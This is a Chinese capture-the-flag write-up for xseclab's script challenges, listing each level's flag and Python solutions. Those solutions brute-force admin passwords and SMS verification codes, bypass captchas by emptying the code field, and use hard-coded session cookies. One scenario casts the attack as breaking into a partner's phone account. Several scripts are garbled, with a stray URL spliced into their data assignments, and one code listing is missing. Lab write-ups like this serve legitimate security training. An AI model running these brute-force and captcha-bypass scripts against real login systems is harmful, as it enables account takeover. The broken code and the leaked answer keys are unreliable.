网络安全实验室|网络信息安全攻防学习平台(脚本关)

1. 小明这次哭了,key又找不到了!!! key啊,你究竟藏到了哪里,为什么我看到的页面上都没有啊!!!!!
地址: http://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/index.php
正确答案: yougotit_script_now
答案解析:我们发现点击后又重定向了,在burpsuite的target里面我们看该目录的回应数据,可以发现key
如图:
网络安全实验室|网络信息安全攻防学习平台(脚本关)
文章图片


2.快速口算:小明要参加一个高技能比赛,要求每个人都要能够快速口算四则运算,2秒钟之内就能够得到结果,但是小明就是一个小学生没有经过特殊的培训,那小明能否通过快速口算测验呢?
【网络安全实验室|网络信息安全攻防学习平台(脚本关)】地址: http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php
正确答案: 123iohHKHJ%^&*(jkh
答案解析:这种需要使用脚本来获取key,因为只有2秒,不可能人来操作。python代码如下:
view plaincopy to clipboard

  1. import requests
  2. import re
  3. from selenium import webdriver
  4. dirver=webdriver.Chrome()
  5. url="http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php"
  6. dirver.get(url)#使用Chrome打开地址
  7. res=dirver.page_source#读取页面代码
  8. print("页面代码:\n%s" %res)
  9. num=re.findall(r'[0-9+*()]+[)]',res)#获取计算式
  10. result=eval(num[0].strip())#计算结果
  11. print("计算结果:%s"%result)
  12. dirver.find_element_by_name( "v").send_keys(result)#搜索输入框输入result
  13. dirver.find_element_by_xpath( "html/body/form").submit()#点击提交按钮
  14. res=dirver.page_source#读取页面代码
  15. print("新页面代码:\n%s" %res)

3.这个题目是空的
Tips:这个题目真不是随便设置的。 什么才是空的呢? 通关地址:没有,请直接提交答案(小写即可)
正确答案: null
答案解析:为空,而且必须输入,当然是null啊!

4.怎么就是弹不出key呢?
提交说明:提交前14个字符即可过关
地址: http://lab1.xseclab.com/xss3_5dcdde90bbe55087eb3514405972b1a6/index.php
正确答案: slakfjteslkjsd
答案解析:查看源码,发现前面有一个a函数返回失败,去掉这些返回为false的函数,然后在稍微修改下:
view plaincopy to clipboard
  1. _点击之后怎么没反应呢?说好的弹窗呢?__


5.逗比验证码第一期:逗比的验证码,有没有难道不一样吗?
地址: http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php
正确答案: LJLJL789sdf#@sd
答案解析:这题想让我们暴力破解,而人工来破解的花至少2小时把,所以我用python来破解,代码如下:
view plaincopy to clipboard
  1. import requests
  2. import re
  3. s=requests.Session()
  4. url="http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php"
  5. head={'cookie':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}
  6. for num in range(1000,10000):
  7. data=https://www.it610.com/article/{'username':'admin','pwd':num,'vcode':'GNZX','submit':'submit'}
  8. res=s.post(url,data=https://www.it610.com/article/data,headers=head).content.decode('utf-8')
  9. if u'pwd error' in res:
  10. print('正在尝试',num,'------密码错误!')
  11. if u'vcode error' in res:
  12. print('验证码错误!')
  13. break
  14. if u'error' not in res:
  15. print(num,'----密码破解成功!')
  16. print(res)
  17. break

6.逗比的验证码第二期:验证便失效的验证码
地址: http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php
正确答案: LJLJL789ss33fasvxcvsdf#@sd
答案解析:将验证码改为空即可
view plaincopy to clipboard
  1. import requests
  2. import re
  3. s=requests.Session()
  4. url="http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/login.php"
  5. head={'cookie':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}
  6. for num in range(1000,10000):
  7. data=https://www.it610.com/article/{'username':'admin','pwd':num,'vcode':'','submit':'submit'}
  8. res=s.post(url,data=https://www.it610.com/article/data,headers=head).content.decode('utf-8')
  9. if u'pwd error' in res:
  10. print('正在尝试',num,'------密码错误!')
  11. if u'vcode error' in res:
  12. print('验证码错误!')
  13. break
  14. if u'error' not in res:
  15. print(num,'----密码破解成功!')
  16. print(res)
  17. break

7.逗比的验证码第三期:验证便失效的验证码
地址: http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php
正确答案: LJLJLfuckvcodesdf#@sd
答案解析:将验证码去除,cookie改为session即可
view plaincopy to clipboard
  1. import requests
  2. import re
  3. s=requests.Session()
  4. url="http://lab1.xseclab.com/vcode3_9d1ea7ad52ad93c04a837e0808b17097/login.php"
  5. head={'session':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}
  6. for num in range(1000,10000):
  7. data=https://www.it610.com/article/{'username':'admin','pwd':num,'vcode':'','submit':'submit'}
  8. res=s.post(url,data=https://www.it610.com/article/data,headers=head).content.decode('utf-8')
  9. if u'pwd error' in res:
  10. print('正在尝试',num,'------密码错误!')
  11. if u'vcode error' in res:
  12. print('验证码错误!')
  13. break
  14. if u'error' not in res:
  15. print(num,'----密码破解成功!')
  16. print(res)
  17. break

8.微笑一下就能通过拉!尼玛,碰到这样的题我能笑得出来嘛...
地址: http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php
正确答案: hkjasfhsa*&IUHKUH
答案解析:查看源代码我们可以发现一个超链接,打开这个超链接是PHP代码,观察后发现from是POST提交,PHP处理是GET,呵呵(●'?'●) 微笑
在后缀里面加?^.^=data:,(●'?'●) 即可

9. 逗比的手机验证码:你的手机号码是13388886666,验证码将会以弹窗的形式给出
地址: http://lab1.xseclab.com/vcode5_mobi_5773f3def9f77f439e058894cefc42a8/
正确答案: LJLJLGod!@@sd
答案解析:傻吊题啊,获取验证码登陆提示13388886667登陆,重新来就是

10.基情燃烧的岁月:你是一名黑客,你怀疑你的“(男/女)闺蜜”的出轨了,你要登陆TA手机的网上营业厅查看详单,一探究竟! 闺蜜手机号码:13388886666
地址: http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/
正确答案: 13399999999
答案解析:用python来破解验证码:
view plaincopy to clipboard
  1. import requests
  2. import re
  3. s=requests.Session()
  4. url="http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/login.php"
  5. head={'cookie':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}
  6. for num in range(100,1000):
  7. data=https://www.it610.com/article/{'username':'13388886666','vcode':num,'Login':'submit'}
  8. res=s.post(url,data=https://www.it610.com/article/data,headers=head).content.decode('utf-8')
  9. if u'vcode or username error' in res:
  10. print('正在尝试',num,'------验证码错误!')
  11. if u'error' not in res:
  12. print(num,'----验证码破解成功!')
  13. print(res)
  14. break
但是不知道为什么答案还是错的!

11.验证码识别 Tips:验证码依然是3位数
地址: http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/index.php
正确答案:
答案解析:暂时没弄出来

12.XSS基础:很容易就可以过关.XSS类题目必须在平台登录才能进行.登录地址请参考左侧<子系统>
地址: http://lab1.xseclab.com/realxss1_f123c17dd9c363334670101779193998/index.php
正确答案:

答案解析:暂时没弄出来

    推荐阅读